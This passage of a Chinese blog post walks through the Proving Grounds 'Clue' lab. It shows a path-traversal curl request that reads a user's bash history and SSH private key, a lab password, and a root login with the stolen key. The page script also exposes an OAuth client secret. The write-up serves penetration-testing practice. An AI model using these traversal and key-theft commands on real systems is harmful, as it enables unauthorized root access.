<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ssh cassie@<span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> -i ~/id_rsa</span><br><span class="line">cassie@<span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span>&#x27;s password<span class="punctuation">:</span></span><br><span class="line">Permission denied<span class="punctuation">,</span> please try again.</span><br><span class="line">cassie@<span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span>&#x27;s password<span class="punctuation">:</span></span><br><span class="line"></span><br><span class="line">ssh anthony@<span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> -i ~/id_rsa</span><br><span class="line">anthony@<span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span>&#x27;s password<span class="punctuation">:</span></span><br></pre></td></tr></table></figure>

<p>难道是root的私钥文件，竟然登录成功了</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">ssh root@<span class="number">192.168</span><span class="number">.166</span><span class="number">.240</span> -i ~/id_rsa</span><br><span class="line"></span><br><span class="line">The programs included with the Debian GNU/Linux system are free software;</span><br><span class="line">the exact distribution terms for each program are described in the</span><br><span class="line">individual files in /usr/share/doc<span class="comment">/*/copyright.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent</span></span><br><span class="line"><span class="comment">permitted by applicable law.</span></span><br><span class="line"><span class="comment">id</span></span><br><span class="line"><span class="comment">uid=0(root) gid=0(root) groups=0(root)</span></span><br></pre></td></tr></table></figure>

<h1 id="官方walk-through"><a href="#官方walk-through" class="headerlink" title="官方walk through"></a>官方walk through</h1><ol>
<li><p>msf 获取到shell</p>
</li>
<li><p>在获取到freeswitch shell后，使用cassie：SecondBiteTheApple330切换到cassie账号（sshd_config限制了只有root和anthony能ssh登录），发现cassie可以不使用密码执行sudo cassandra-web， 使用root账号可以读取系统上所有文件</p>
</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">freeswitch@clue:/$ su - cassie</span><br><span class="line">Password: SecondBiteTheApple330</span><br><span class="line">cassie@clue:~$ sudo -l</span><br><span class="line">Matching Defaults entries for cassie on clue:</span><br><span class="line">    env_reset, mail_badpass,</span><br><span class="line">    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</span><br><span class="line">User cassie may run the following commands on clue:</span><br><span class="line">    (ALL) NOPASSWD: /usr/local/bin/cassandra-web</span><br></pre></td></tr></table></figure>

<ol start="3">
<li><p>通过444端口查看&#x2F;home&#x2F;anthony&#x2F;.bash_history 文件， anthony生成了密钥对，然后把公钥复制到root&#x2F;.ssh&#x2F;authorized_keys文件</p>
 <figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">cassie@clue<span class="punctuation">:</span>~$ curl localhost<span class="punctuation">:</span><span class="number">444</span>/../../../../../../../../home/anthony/.bash_history --path-as-is</span><br><span class="line">clear</span><br><span class="line">ls -la</span><br><span class="line">ssh-keygen</span><br><span class="line">cp .ssh/id_rsa.pub .ssh/authorized_keys</span><br><span class="line">sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>
</li>
<li><p>下载私钥文件，ssh <a href="mailto:&#114;&#x6f;&#x6f;&#116;&#64;&#x31;&#50;&#55;&#x2e;&#48;&#46;&#x30;&#x2e;&#x31;" rel="external nofollow noopener noreferrer" target="_blank">&#114;&#x6f;&#x6f;&#116;&#64;&#x31;&#50;&#55;&#x2e;&#48;&#46;&#x30;&#x2e;&#x31;</a> -i id_rsa, 根据这一步怀疑是官方忘记清理&#x2F;home&#x2F;cassie&#x2F;id_rsa了，我才能直接读取后登录root.</p>
 <figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">cassie@clue<span class="punctuation">:</span>~$ curl localhost<span class="punctuation">:</span><span class="number">444</span>/../../../../../../../../home/anthony/.ssh/id_rsa --path-as-is -o id_rsa</span><br><span class="line">  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</span><br><span class="line">                                 Dload  Upload   Total   Spent    Left  Speed</span><br><span class="line"><span class="number">100</span>  <span class="number">1823</span>  <span class="number">100</span>  <span class="number">1823</span>    <span class="number">0</span>     <span class="number">0</span>   <span class="number">178</span>k      <span class="number">0</span> --<span class="punctuation">:</span>--<span class="punctuation">:</span>-- --<span class="punctuation">:</span>--<span class="punctuation">:</span>-- --<span class="punctuation">:</span>--<span class="punctuation">:</span>--  <span class="number">197</span>k</span><br><span class="line">cassie@clue<span class="punctuation">:</span>~$ chmod <span class="number">600</span> id_rsa</span><br><span class="line">cassie@clue<span class="punctuation">:</span>~$ ls -l id_rsa</span><br><span class="line">-rw------- <span class="number">1</span> cassie cassie <span class="number">1823</span> Aug  <span class="number">2</span> <span class="number">16</span><span class="punctuation">:</span><span class="number">40</span> id_rsa</span><br><span class="line">cassie@clue<span class="punctuation">:</span>~$ ssh -i id_rsa -l root <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">The authenticity of host &#x27;<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> (<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>)&#x27; can&#x27;t be established.</span><br><span class="line">...</span><br><span class="line">Linux clue <span class="number">4.19</span><span class="number">.0</span><span class="number">-21</span>-amd64 #<span class="number">1</span> SMP Debian <span class="number">4.19</span><span class="number">.249</span><span class="number">-2</span> (<span class="number">2022</span><span class="number">-06</span><span class="number">-30</span>) x86_64</span><br><span class="line">...</span><br><span class="line">root@clue<span class="punctuation">:</span>~# id</span><br><span class="line">uid=<span class="number">0</span>(root) gid=<span class="number">0</span>(root) groups=<span class="number">0</span>(root)</span><br></pre></td></tr></table></figure></li>
</ol>
<h1 id="反思"><a href="#反思" class="headerlink" title="反思"></a>反思</h1><p>如果&#x2F;home&#x2F;cassie目录下没有id_rsa文件，我还能成功吗？ 难</p>
<ol>
<li><p>我为什么没有得到freeswitch的交互式shell</p>
<ol>
<li><p>这次深刻体会到了前人经验中所说的：机器上开放了哪些端口，nc 反弹shell就是用哪些端口，测试8021和80能成功，其他端口都可以</p>
</li>
<li><p>使用443端口时会返回timeout，而这个timeout实际是因为expolit.py中设置了5s的超时，而不是服务器主动断开的，当时让我有即使我反弹成功了，5s后也会断开的错觉，没有继续尝试<br> <img data-src="https://thiiiiink.com/202508/asynccode-39.png.png"></p>
</li>
</ol>
<p>   exploit代码一定得好好读，弄清楚原理
 </p>
</li>
<li><p>忽略了cassie的密码这样的重要信息，一定得细致，收集信息是关键</p>
</li>
<li><p>在使用freeswitch读取anthoy&#x2F;.bash_history没有权限之后，即使在使用cassia sudo 能读取全部文件之后，我大概率会忽略这个文件，因为心理暗示自己已经查看过来，是自己的大忌，总想着先排除一些信息，把问题缩小，以后一定得注意在获取新的账号权限后，把之前的信息收集再做一次</p>
</li>
</ol>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Yiaos
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="https://www.thiiiiink.com/post/20250214231937.html" title="Proving Grounds Practice - Clue">https://www.thiiiiink.com/post/20250214231937.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow noopener noreferrer" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/post/20250215022657.html" rel="prev" title="Proving Grounds Practice - Cockpit">
      <i class="fa fa-chevron-left"></i> Proving Grounds Practice - Cockpit
    </a></div>
      <div class="post-nav-item">
    <a href="/post/20241110205111.html" rel="next" title="CVE-2024-43532-译">
      CVE-2024-43532-译 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#scan"><span class="nav-text">scan</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#autorecon"><span class="nav-text">autorecon</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#foothold"><span class="nav-text">foothold</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#smb%E5%8C%BF%E5%90%8D%E7%99%BB%E5%BD%95"><span class="nav-text">smb匿名登录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#freeswitch"><span class="nav-text">freeswitch</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cassandra"><span class="nav-text">cassandra</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#File-Read-Cmd-Execute"><span class="nav-text">File Read &amp; Cmd Execute</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%98%E6%96%B9walk-through"><span class="nav-text">官方walk through</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%8D%E6%80%9D"><span class="nav-text">反思</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Yiaos</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">39</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/yiaos" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yiaos" rel="external nofollow noopener noreferrer" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="external nofollow noopener noreferrer" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yiaos</span>
</div>
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/medium-zoom@1/dist/medium-zoom.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  
  <script>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>




  
<script src="/js/local-search.js"></script>













  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'Ov23lioxBWzEMyWt1JhD',
      clientSecret: '6d63e8f9065e954d63e6a90407d40a3ccee85f0e',
      repo        : 'Yiaos.github.io',
      owner       : 'Yiaos',
      admin       : ['Yiaos'],
      id          : 'ca2eaf95ac47409cdaff72d54e5c1176',
        language: 'en',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
